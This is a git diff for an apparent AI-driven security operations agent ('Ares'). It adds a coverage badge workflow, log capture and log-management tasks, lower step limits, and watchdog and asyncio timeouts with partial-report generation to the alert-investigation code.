diff --git a/.github/badges/coverage.svg b/.github/badges/coverage.svg new file mode 100644 index 00000000..f9095ee3 --- /dev/null +++ b/.github/badges/coverage.svg @@ -0,0 +1,16 @@ + + + + + + + + + + + coverage + coverage + N/A + N/A + + diff --git a/.github/workflows/coverage-badge.yaml b/.github/workflows/coverage-badge.yaml new file mode 100644 index 00000000..0f1d7211 --- /dev/null +++ b/.github/workflows/coverage-badge.yaml @@ -0,0 +1,49 @@ +--- +name: 📊 Coverage Badge + +on: + workflow_run: + workflows: ["🐍 Python Tests"] + types: + - completed + branches: + - main + +permissions: + contents: write + +jobs: + badge: + name: 📊 Generate coverage badge + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + + steps: + - name: Set up git repository + uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1 + + - name: Download coverage artifact + uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16 # v4.1.8 + with: + name: coverage-report + run-id: ${{ github.event.workflow_run.id }} + github-token: ${{ secrets.GITHUB_TOKEN }} + + - name: Set up Python + uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0 + with: + python-version: "3.12" + + - name: Generate coverage badge + run: | + pip install "genbadge[coverage]" + mkdir -p .github/badges + genbadge coverage -i coverage.xml -o .github/badges/coverage.svg + + - name: Commit badge + run: | + git config --local user.email "github-actions[bot]@users.noreply.github.com" + git config --local user.name "github-actions[bot]" + git add .github/badges/coverage.svg + git diff --staged --quiet || git commit -m "Update coverage badge [skip ci]" + git push diff --git a/.github/workflows/tests.yaml b/.github/workflows/tests.yaml index 0ff24b80..9f83af99 100644 --- a/.github/workflows/tests.yaml +++ b/.github/workflows/tests.yaml @@ -55,4 +55,12 @@ jobs: - name: Run tests with coverage run: | - pytest --cov=src --cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist + pytest --cov=src --cov-report=xml --cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist + + - name: Upload coverage report + if: github.ref == 'refs/heads/main' && github.event_name == 'push' && matrix.python-version == '3.12' + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2 + with: + name: coverage-report + path: coverage.xml + retention-days: 1 diff --git a/.gitignore b/.gitignore index 6450c881..0bef9302 100644 --- a/.gitignore +++ b/.gitignore @@ -6,6 +6,7 @@ test-alerts/ TODO .tool-versions /reports/ +/logs/ # Custom parquet storage *.parquet diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 8a47f4ed..c196b5b5 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -93,6 +93,7 @@ repos: rev: v1.19.1 hooks: - id: mypy + exclude: ^tests/ additional_dependencies: - "types-PyYAML" - "types-requests" diff --git a/README.md b/README.md index 52f373c7..093cd982 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,15 @@ # Ares - Autonomous Security Operations Agent + +
+ +[![Pre-Commit](https://github.com/dreadnode/python-template/actions/workflows/pre-commit.yaml/badge.svg)](https://github.com/dreadnode/python-template/actions/workflows/pre-commit.yaml) +[![Renovate](https://github.com/dreadnode/python-template/actions/workflows/renovate.yaml/badge.svg)](https://github.com/dreadnode/python-template/actions/workflows/renovate.yaml) +[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) + +
+ + [![Pre-Commit](https://github.com/dreadnode/ares/actions/workflows/pre-commit.yaml/badge.svg)](https://github.com/dreadnode/ares/actions/workflows/pre-commit.yaml) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) [![Python](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/downloads/) @@ -161,7 +171,7 @@ uv run python -m ares \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ --args.poll-interval 30 \ - --args.max-steps 150 \ + --args.max-steps 30 \ --args.report-dir ./reports # Run once and exit (process current alerts only) @@ -176,7 +186,7 @@ Investigate a specific alert by providing it as JSON: uv run python -m ares investigate-alert test-alerts/example-alert.json \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ - --args.max-steps 150 + --args.max-steps 30 ``` #### Red Team - Penetration Testing @@ -212,7 +222,7 @@ task ares:red: TARGET=192.168.1.100 # Or via CLI uv run python -m ares red-team 192.168.1.100 \ --args.model claude-sonnet-4-20250514 \ - --args.max-steps 150 \ + --args.max-steps 30 \ --args.report-dir ./reports ``` @@ -229,8 +239,27 @@ bloodhound-python). | `--args.model` | `claude-sonnet-4-20250514` | LLM model to use | | `--args.grafana-url` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts and MCP | | `--args.poll-interval` | `30` | Seconds between alert polls | -| `--args.max-steps` | `150` | Maximum agent steps per investigation | +| `--args.max-steps` | `30` | Maximum LLM round trips per investigation | | `--args.report-dir` | `./reports` | Directory for markdown reports | +| `--args.once` | `false` | Process current alerts once and exit | + +**Stop Conditions:** + +The agent stops when **any** of these conditions are met: + +- `complete_investigation()` tool is called (normal completion) +- `escalate_investigation()` tool is called (escalation to human) +- 5 Loki/Prometheus queries executed +- 20 total tool calls made (prevents infinite loops) +- `max_steps` LLM round trips reached + +**Timeout Behavior:** + +The agent has multiple timeout layers: + +- Hard timeout: `max_steps × 60 seconds` (1 minute per step) +- Watchdog thread: Force-exits if timeout exceeded +- When using Taskfile, defaults are 15 steps (once mode) or 50 steps (polling mode) **Dreadnode Platform Arguments (`--dn-args.*`):** diff --git a/Taskfile.yaml b/Taskfile.yaml index 3c6a004b..bdfc31a2 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -15,8 +15,10 @@ vars: MODEL: '{{.MODEL | default "claude-sonnet-4-20250514"}}' GRAFANA_URL: '{{.GRAFANA_URL | default "https://grafana.dev.plundr.ai"}}' POLL_INTERVAL: '{{.POLL_INTERVAL | default "30"}}' - MAX_STEPS: '{{.MAX_STEPS | default "150"}}' + MAX_STEPS: '{{.MAX_STEPS | default "50"}}' + MAX_STEPS_ONCE: '{{.MAX_STEPS_ONCE | default "15"}}' # ~15 min max for once mode REPORT_DIR: '{{.REPORT_DIR | default "./reports"}}' + LOG_DIR: '{{.LOG_DIR | default "./logs"}}' DREADNODE_SERVER: '{{.DREADNODE_SERVER | default "https://platform.dev.plundr.ai/"}}' DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION | default "ares"}}' DREADNODE_WORKSPACE: '{{.DREADNODE_WORKSPACE | default "ares-protocol"}}' @@ -153,13 +155,17 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal) export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "") export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "") + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -170,7 +176,8 @@ tasks: --dn-args.token "$DREADNODE_API_KEY" \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:blue:once: desc: Run blue team agent once and exit (uses 1Password for API keys) @@ -178,25 +185,30 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal) export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "") export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "") + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ --args.poll-interval {{.POLL_INTERVAL}} \ - --args.max-steps {{.MAX_STEPS}} \ + --args.max-steps {{.MAX_STEPS_ONCE}} \ --args.report-dir {{.REPORT_DIR}} \ --args.once \ --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.token "$DREADNODE_API_KEY" \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:blue:local: desc: Run blue team agent using .env file (no 1Password) @@ -204,7 +216,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | if [ ! -f .env ]; then @@ -216,6 +228,10 @@ tasks: . ./.env set +a + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -225,7 +241,8 @@ tasks: --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:blue:local:once: desc: Run blue team agent once and exit using .env file (no 1Password) @@ -233,7 +250,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | if [ ! -f .env ]; then @@ -245,17 +262,22 @@ tasks: . ./.env set +a + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ --args.poll-interval {{.POLL_INTERVAL}} \ - --args.max-steps {{.MAX_STEPS}} \ + --args.max-steps {{.MAX_STEPS_ONCE}} \ --args.report-dir {{.REPORT_DIR}} \ --args.once \ --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:investigate: desc: "Investigate a specific alert from JSON file (usage: task ares:investigate ALERT=alert.json)" @@ -270,7 +292,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal) @@ -280,7 +302,7 @@ tasks: uv run python -m ares investigate-alert {{.ALERT}} \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ - --args.max-steps {{.MAX_STEPS}} \ + --args.max-steps {{.MAX_STEPS_ONCE}} \ --args.report-dir {{.REPORT_DIR}} \ --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.token "$DREADNODE_API_KEY" \ @@ -408,6 +430,99 @@ tasks: echo "✅ Reports cleaned" fi + # =========================================================================== + # Ares Local Log Management + # =========================================================================== + + ares:logs:list: + desc: List all local agent logs + cmds: + - | + echo "Agent Logs:" + echo "===========" + if [ -d {{.LOG_DIR}} ]; then + ls -lht {{.LOG_DIR}}/*.log 2>/dev/null || echo "No logs found" + else + echo "Log directory not found: {{.LOG_DIR}}" + fi + + ares:logs:tail: + desc: "Tail the latest log file (usage: task ares:logs:tail [LINES=100] [FOLLOW=true])" + vars: + LINES: '{{.LINES | default "100"}}' + FOLLOW: '{{.FOLLOW | default "false"}}' + cmds: + - | + LATEST=$(ls -t {{.LOG_DIR}}/*.log 2>/dev/null | head -1) + if [ -z "$LATEST" ]; then + echo "No logs found in {{.LOG_DIR}}" + exit 1 + fi + + echo "📋 Log file: $LATEST" + echo "======================================================================" + + if [ "{{.FOLLOW}}" = "true" ]; then + tail -f "$LATEST" + else + tail -n {{.LINES}} "$LATEST" + fi + + ares:logs:blue: + desc: "Tail the latest blue team log (usage: task ares:logs:blue [LINES=100] [FOLLOW=true])" + vars: + LINES: '{{.LINES | default "100"}}' + FOLLOW: '{{.FOLLOW | default "false"}}' + cmds: + - | + LATEST=$(ls -t {{.LOG_DIR}}/blue-*.log 2>/dev/null | head -1) + if [ -z "$LATEST" ]; then + echo "No blue team logs found in {{.LOG_DIR}}" + exit 1 + fi + + echo "📋 Blue team log: $LATEST" + echo "======================================================================" + + if [ "{{.FOLLOW}}" = "true" ]; then + tail -f "$LATEST" + else + tail -n {{.LINES}} "$LATEST" + fi + + ares:logs:red: + desc: "Tail the latest red team log (usage: task ares:logs:red [LINES=100] [FOLLOW=true])" + vars: + LINES: '{{.LINES | default "100"}}' + FOLLOW: '{{.FOLLOW | default "false"}}' + cmds: + - | + LATEST=$(ls -t {{.LOG_DIR}}/red-*.log 2>/dev/null | head -1) + if [ -z "$LATEST" ]; then + echo "No red team logs found in {{.LOG_DIR}}" + exit 1 + fi + + echo "📋 Red team log: $LATEST" + echo "======================================================================" + + if [ "{{.FOLLOW}}" = "true" ]; then + tail -f "$LATEST" + else + tail -n {{.LINES}} "$LATEST" + fi + + ares:logs:clean: + desc: Remove all local agent logs + cmds: + - | + read -p "Delete all logs in {{.LOG_DIR}}? (y/N) " -n 1 -r + echo + if [[ $REPLY =~ ^[Yy]$ ]]; then + rm -rf {{.LOG_DIR}}/*.log + echo "✅ Logs cleaned" + fi + ares:version: desc: Show Ares version information cmds: @@ -450,7 +565,7 @@ tasks: internal: true vars: PROFILE: '{{.PROFILE | default "lab"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | # Check if AWS CLI is installed @@ -485,7 +600,7 @@ tasks: vars: TARGET: '{{.TARGET | default ""}}' PROFILE: '{{.PROFILE | default "lab"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' REDTEAM_PROJECT: '{{.REDTEAM_PROJECT | default "ares-redteam"}}' preconditions: - sh: test -n "{{.TARGET}}" @@ -521,6 +636,10 @@ tasks: echo "✅ Resolved to: $RESOLVED_TARGET" fi + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares red-team "$RESOLVED_TARGET" \ --args.model {{.MODEL}} \ --args.max-steps {{.MAX_STEPS}} \ @@ -529,7 +648,8 @@ tasks: --dn-args.token "$DREADNODE_API_KEY" \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.REDTEAM_PROJECT}} + --dn-args.project {{.REDTEAM_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:red:local: desc: "Run red team agent using .env file (usage: task ares:red:local TARGET=192.168.1.100)" @@ -550,6 +670,10 @@ tasks: . ./.env set +a + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares red-team {{.TARGET}} \ --args.model {{.MODEL}} \ --args.max-steps {{.MAX_STEPS}} \ @@ -557,16 +681,17 @@ tasks: --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.REDTEAM_PROJECT}} + --dn-args.project {{.REDTEAM_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:red:logs: desc: "Tail red team agent logs from Kali via SSM (usage: task ares:red:logs [KALI=instance-name] [LINES=100] [FOLLOW=true])" vars: - KALI: '{{.KALI | default "dev-alpha-operator-range-kali"}}' + KALI: '{{.KALI | default "staging-alpha-operator-range-kali"}}' LINES: '{{.LINES | default "100"}}' FOLLOW: '{{.FOLLOW | default "false"}}' PROFILE: '{{.PROFILE | default "lab"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' deps: - task: check-aws-auth vars: diff --git a/docs/taskfile_usage.md b/docs/taskfile_usage.md index 9e5bf841..1b7d53f3 100644 --- a/docs/taskfile_usage.md +++ b/docs/taskfile_usage.md @@ -304,13 +304,39 @@ All tasks support the following configuration variables: | `MODEL` | `claude-sonnet-4-20250514` | LLM model to use | | `GRAFANA_URL` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts | | `POLL_INTERVAL` | `30` | Seconds between alert polls | -| `MAX_STEPS` | `150` | Maximum agent steps per investigation | +| `MAX_STEPS` | `50` | Maximum agent steps for polling mode (Taskfile override, code default is 30) | +| `MAX_STEPS_ONCE` | `15` | Maximum agent steps for once/investigate modes | | `REPORT_DIR` | `./reports` | Directory for markdown reports | | `DREADNODE_SERVER` | `https://platform.dev.plundr.ai/` | Dreadnode platform URL | | `DREADNODE_ORGANIZATION` | `ares` | Dreadnode organization name | | `DREADNODE_WORKSPACE` | `ares-protocol` | Dreadnode workspace name | | `DREADNODE_PROJECT` | `ares-soc` | Dreadnode project name | +**Stop Conditions:** + +The agent will stop when **any** of these conditions are met: + +- Agent calls `complete_investigation()` (normal completion) +- Agent calls `escalate_investigation()` (escalation to human) +- 5 Loki/Prometheus queries executed +- **20 total tool calls made** (prevents infinite loops) +- `max_steps` LLM round trips reached + +**Timeout Behavior:** + +The agent has multiple timeout layers: + +- Hard timeout: `max_steps × 60 seconds` (1 minute per step) +- Watchdog thread: Force-exits if timeout exceeded + +| Mode | Default Steps | Max Timeout | +| --- | --- | --- | +| `ares:blue:once:` | 15 | ~15 minutes | +| `ares:blue:local:once:` | 15 | ~15 minutes | +| `ares:investigate` | 15 | ~15 minutes | +| `ares:blue:` (polling) | 50 | ~50 minutes per alert | +| `ares:blue:local:` (polling) | 50 | ~50 minutes per alert | + **Example with custom variables:** ```bash diff --git a/pyproject.toml b/pyproject.toml index 2db34b49..ede9da03 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -21,6 +21,7 @@ dependencies = [ "cyclopts>=4.2.0", "loguru>=0.7.3", "httpx>=0.28.0,<1.0.0", + "boto3>=1.42.25", ] [project.optional-dependencies] diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py index 6a4e3f16..769f9584 100644 --- a/src/ares/agents/blue/soc_investigator.py +++ b/src/ares/agents/blue/soc_investigator.py @@ -4,6 +4,8 @@ Main agent implementation using Dreadnode Agent SDK. """ +import os +import threading import uuid from datetime import datetime, timedelta, timezone from pathlib import Path @@ -11,12 +13,76 @@ import dreadnode as dn from loguru import logger -from ares.core.factories.blue_factory import create_investigation_agent -from ares.core.models import InvestigationState +from ares.core.factories.blue_factory import create_investigation_agent, reset_query_tracking +from ares.core.models import InvestigationState, TimelineEvent +from ares.core.persistence import ( + create_stored_investigation_from_state, + get_investigation_store, +) from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient +class InvestigationTimeoutError(Exception): + """Raised when investigation exceeds hard timeout.""" + + +class WatchdogTimer: + """Watchdog that generates report and forcefully exits if timeout is exceeded.""" + + def __init__( + self, + timeout_seconds: int, + investigation_id: str, + state: "InvestigationState", + report_dir: Path, + ): + self.timeout = timeout_seconds + self.investigation_id = investigation_id + self.state = state + self.report_dir = report_dir + self._timer: threading.Timer | None = None + self._cancelled = False + + def _timeout_handler(self) -> None: + if self._cancelled: + return + + logger.critical( + f"WATCHDOG: Investigation {self.investigation_id} exceeded " + f"hard timeout of {self.timeout}s" + ) + logger.warning( + f"Current state: {len(self.state.evidence)} evidence items, " + f"{len(self.state.timeline)} timeline events" + ) + + # Generate partial report before dying + try: + from ares.reports.investigation import MarkdownReportGenerator + + generator = MarkdownReportGenerator(self.report_dir) + report_path = generator.generate(self.state) + logger.warning(f"Partial report saved to: {report_path}") + except Exception as e: + logger.error(f"Failed to generate partial report: {e}") + + logger.critical("Forcing exit due to timeout") + os._exit(1) + + def start(self) -> None: + self._timer = threading.Timer(self.timeout, self._timeout_handler) + self._timer.daemon = True + self._timer.start() + logger.info(f"Watchdog started: {self.timeout}s ({self.timeout // 60}m)") + + def cancel(self) -> None: + self._cancelled = True + if self._timer: + self._timer.cancel() + logger.debug("Watchdog cancelled") + + def build_initial_prompt(alert: dict) -> str: """Build the initial prompt with alert context. @@ -44,7 +110,6 @@ def build_initial_prompt(alert: dict) -> str: if key in labels: mitre_technique = labels[key] break - # Also check annotations if not mitre_technique: for key in ["mitre_technique", "mitre", "technique_id", "technique"]: if key in annotations: @@ -97,7 +162,7 @@ def __init__( grafana_api_key: str, mitre_client: MITREAttackClient, report_dir: Path, - max_steps: int = 150, + max_steps: int = 30, ): self.model = model self.grafana_url = grafana_url @@ -109,19 +174,28 @@ def __init__( self._mcp_tools = None async def _ensure_mcp_connection(self) -> None: - """Ensure MCP connection is established.""" + """Ensure MCP connection is established (with 60s timeout).""" + import asyncio + if self._mcp_client is None: from ares.tools.blue.grafana import connect_grafana_mcp try: logger.info("Connecting to Grafana MCP server...") - self._mcp_client = await connect_grafana_mcp( - grafana_url=self.grafana_url, - grafana_api_key=self.grafana_api_key, + self._mcp_client = await asyncio.wait_for( # type: ignore[func-returns-value] + connect_grafana_mcp( + grafana_url=self.grafana_url, + grafana_api_key=self.grafana_api_key, + ), + timeout=60.0, ) self._mcp_tools = self._mcp_client.tools tool_count = len(self._mcp_tools) if self._mcp_tools else 0 logger.success(f"Grafana MCP connected ({tool_count} tools available)") + except asyncio.TimeoutError: + logger.warning("Grafana MCP connection timed out after 60s") + logger.warning("Continuing without MCP tools") + self._mcp_tools = None except Exception as e: logger.warning(f"Failed to connect to Grafana MCP: {e}") logger.warning("Continuing without MCP tools") @@ -129,10 +203,18 @@ async def _ensure_mcp_connection(self) -> None: async def _shutdown_mcp(self) -> None: """Shutdown MCP connection if active.""" + import asyncio + if self._mcp_client: try: - await self._mcp_client.__aexit__(None, None, None) + # Add timeout to prevent hanging on shutdown + await asyncio.wait_for( + self._mcp_client.__aexit__(None, None, None), + timeout=10.0, + ) logger.info("Grafana MCP connection closed") + except asyncio.TimeoutError: + logger.warning("MCP shutdown timed out after 10s, forcing close") except Exception as e: logger.warning(f"Error closing MCP connection: {e}") finally: @@ -158,108 +240,298 @@ async def investigate(self, alert: dict) -> dict: - highest_pyramid_level: Highest Pyramid of Pain level reached (1-6) Raises: - TimeoutError: If investigation exceeds the configured timeout. + InvestigationTimeoutError: If investigation exceeds the hard timeout. """ investigation_id = f"inv-{uuid.uuid4().hex[:8]}" alert_name = alert.get("labels", {}).get("alertname", "unknown") logger.info(f"Starting investigation {investigation_id} for alert: {alert_name}") - # Ensure MCP connection is ready - await self._ensure_mcp_connection() + # Reset query tracking for this investigation + reset_query_tracking() - # Create investigation state + # Create investigation state early so we can generate partial reports on timeout state = InvestigationState( investigation_id=investigation_id, alert=alert, ) - # Auto-extract and record MITRE technique from alert + # Hard timeout using watchdog thread (works even if event loop is blocked) + # 1 minute per step + 2 minutes buffer for setup/teardown + hard_timeout_seconds = (self.max_steps * 60) + 120 + watchdog = WatchdogTimer( + hard_timeout_seconds, + investigation_id, + state, + self.report_dir, + ) + watchdog.start() + + try: + # Ensure MCP connection is ready + await self._ensure_mcp_connection() + + # Auto-extract and record MITRE technique from alert + labels = alert.get("labels", {}) + annotations = alert.get("annotations", {}) + for key in ["mitre_technique", "mitre", "technique_id", "technique"]: + if labels.get(key): + tech_id = labels[key] + state.identified_techniques.add(tech_id) + # Resolve technique name and tactic + technique = self.mitre_client.get_technique(tech_id) + if technique: + state.technique_names[tech_id] = technique.name + state.technique_to_tactic[tech_id] = technique.tactic or "Unknown" + if technique.tactic: + state.identified_tactics.add(technique.tactic) + logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}") + break + if annotations.get(key): + tech_id = annotations[key] + state.identified_techniques.add(tech_id) + # Resolve technique name and tactic + technique = self.mitre_client.get_technique(tech_id) + if technique: + state.technique_names[tech_id] = technique.name + state.technique_to_tactic[tech_id] = technique.tactic or "Unknown" + if technique.tactic: + state.identified_tactics.add(technique.tactic) + logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}") + break + + self._create_alert_timeline_event(state, alert) + + initial_prompt = build_initial_prompt(alert) + + with dn.run(tags=["soc-investigation", alert_name]): + dn.log_params( + model=self.model, + investigation_id=investigation_id, + alert_name=alert_name, + alert_severity=alert.get("labels", {}).get("severity", "unknown"), + max_steps=self.max_steps, + mcp_tools_available=self._mcp_tools is not None, + mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0, + ) + dn.log_input("alert", alert) + + agent = create_investigation_agent( + model=self.model, + grafana_url=self.grafana_url, + grafana_api_key=self.grafana_api_key, + mitre_client=self.mitre_client, + state=state, + grafana_mcp_tools=self._mcp_tools, + max_steps=self.max_steps, + ) + + # Run the investigation with asyncio timeout (backup to watchdog) + try: + import asyncio + + logger.info(f"Starting agent.run() with max_steps={self.max_steps}") + + # Asyncio timeout as secondary measure + timeout_seconds = self.max_steps * 60 + + result = await asyncio.wait_for( + agent.run(initial_prompt), + timeout=timeout_seconds, + ) + + logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}") + + status = "completed" + if state.escalated: + status = "escalated" + elif result.stop_reason and "max" in str(result.stop_reason).lower(): + status = "incomplete" + logger.warning( + f"Agent reached max_steps ({self.max_steps}) without completion" + ) + + # Generate report + report_path = self._generate_report(state, result) + + # Persist investigation for learning + self._persist_investigation(state, status) + + dn.log_output("report_path", str(report_path)) + dn.log_metric("investigation_success", 1) + + return { + "investigation_id": investigation_id, + "status": status, + "report_path": str(report_path), + "evidence_count": len(state.evidence), + "techniques_identified": list(state.identified_techniques), + "highest_pyramid_level": state.highest_pyramid_level, + } + + except asyncio.TimeoutError: + logger.error(f"Investigation timed out after {timeout_seconds}s (asyncio)") + logger.error( + f"Current state: {len(state.evidence)} evidence items, " + f"{len(state.timeline)} timeline events" + ) + dn.log_metric("investigation_timeout", 1) + + # Still generate a partial report on timeout + report_path = self._generate_report(state, None) + + # Persist investigation for learning (even on timeout) + self._persist_investigation(state, "timeout") + + return { + "investigation_id": investigation_id, + "status": "timeout", + "report_path": str(report_path), + "evidence_count": len(state.evidence), + "techniques_identified": list(state.identified_techniques), + "highest_pyramid_level": state.highest_pyramid_level, + } + + except Exception as e: + logger.error(f"Investigation failed: {e}") + dn.log_metric("investigation_failed", 1) + + # Persist failed investigation + self._persist_investigation(state, "failed") + raise + + finally: + # Always cancel the watchdog on normal completion + watchdog.cancel() + + def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) -> None: + """Create an initial timeline event from the alert.""" labels = alert.get("labels", {}) annotations = alert.get("annotations", {}) - for key in ["mitre_technique", "mitre", "technique_id", "technique"]: + + starts_at = alert.get("startsAt", "") + try: + if starts_at: + alert_time = datetime.fromisoformat(starts_at.replace("Z", "+00:00")) + else: + alert_time = datetime.now(timezone.utc) + except ValueError: + alert_time = datetime.now(timezone.utc) + + alert_name = labels.get("alertname", "Unknown Alert") + severity = labels.get("severity", "unknown") + summary = annotations.get("summary", annotations.get("description", "")) + + description = f"{severity.upper()} alert triggered: {alert_name}" + if summary: + description += f" - {summary[:100]}" + + mitre_techniques = [] + for key in ["mitre_technique", "mitre", "technique_id"]: if labels.get(key): - state.identified_techniques.add(labels[key]) - logger.info(f"Auto-recorded MITRE technique from alert: {labels[key]}") + mitre_techniques.append(labels[key]) break if annotations.get(key): - state.identified_techniques.add(annotations[key]) - logger.info(f"Auto-recorded MITRE technique from alert: {annotations[key]}") + mitre_techniques.append(annotations[key]) break - initial_prompt = build_initial_prompt(alert) - - with dn.run(tags=["soc-investigation", alert_name]): - dn.log_params( - model=self.model, - investigation_id=investigation_id, - alert_name=alert_name, - alert_severity=alert.get("labels", {}).get("severity", "unknown"), - max_steps=self.max_steps, - mcp_tools_available=self._mcp_tools is not None, - mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0, - ) - dn.log_input("alert", alert) - - agent = create_investigation_agent( - model=self.model, - grafana_url=self.grafana_url, - grafana_api_key=self.grafana_api_key, - mitre_client=self.mitre_client, - state=state, - grafana_mcp_tools=self._mcp_tools, - max_steps=self.max_steps, - ) - - # Run the investigation with timeout - try: - import asyncio + event = TimelineEvent( + id="tl-alert-0000", + timestamp=alert_time, + description=description, + evidence_ids=[], + mitre_techniques=mitre_techniques, + confidence=0.9, + source="alert", + ) - logger.info(f"Starting agent.run() with max_steps={self.max_steps}") + state.timeline.append(event) + logger.info(f"Created initial timeline event from alert: 